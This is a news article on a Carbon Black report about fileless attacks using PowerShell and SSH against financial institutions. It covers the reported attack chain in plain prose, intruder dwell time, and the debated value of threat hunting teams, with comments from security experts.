Intruders are starting to use “good tools,” such as PowerShell and Secure Shell, to gain entry into financial networks through existing software rather than planting malware, and more than half of successful breaches are now fileless attacks, says a Carbon Black report.
The financial sector is among those that have taken the strongest steps toward cybersecurity, but it still focuses more on prevention than detection, something that must change in this new environment, says the report, “Modern Bank Heists: Cyberattacks & Lateral Movement in the Financial Sector.”
One possible solution: About 37 percent of financial institutions have established threat hunting teams that actively search for potential problems before any damage is done.
“Perimeter-based security based on defense in depth will not succeed in defending our infrastructure against the threats of today,” says Tom Kellermann, chief cybersecurity officer for Carbon Black.
Flash Remains an Attack Vector
The report outlines a typical attack via these tools: A user goes to an internet site, prompted by a phishing email. The page loads Flash onto the user’s computer; Flash connects to PowerShell and feeds it instructions. PowerShell then connects to the hacker’s server and downloads script that finds and sends valuable data back to the hacker.
Among Carbon Black customers surveyed, 97 percent have been targeted by a nonmalware attack in the past two years, according to the report, and 90 percent reported attempted ransomware attacks.
“There is a common theme why cybercriminals are increasingly leveraging non-malware attacks: they are following the path of least resistance,” the report states, but adds, “The fact that 90 percent of CISOs reported seeing such an attack leveraging PowerShell is a good thing.”
Cut Back on Intruder Dwell Time
The ultimate goal should be to decrease dwell time, or the amount of time malware is active in a system before the breach is detected. Dwell time now averages about 101 days, according to a Mandiant report released in April. Other reports, including Carbon Black’s, put that average closer to 200 days or more.
“Detection needs to happen before it gets to the system,” says Karen Scarfone, principal consultant for Scarfone Cybersecurity. That’s true especially when the attack comes in a fileless form, she adds: “It can be easier to get in.”
Threat hunting teams can be valuable in cutting down dwell time, according to the Carbon Black report, proactively running down clues that intruders may be present. Such a team should be multidisciplinary, Kellermann says, including incident response experts, “red team” members, risk managers and people with other forms of IT expertise.
These teams would bring a flexibility not always present in incident response, enabling a financial institution to respond to counterattacks, according to the report (1 in 4 financial institutions experience counterattacks after responding defensively).
“Teams should be prepared to throw out the IR playbook when necessary,” the report states.
The Value of Threat Hunting Teams Varies
Threat hunting, however, can be controversial, says Scarfone. Some enterprises say that it works, but others “think it is ineffective for the amount of money that it costs,” she says.
“People who do threat hunting well tend to be very expensive professionals,” she says. “But for a large financial institution, that might be worthwhile to them because they’re facing such significant threats.”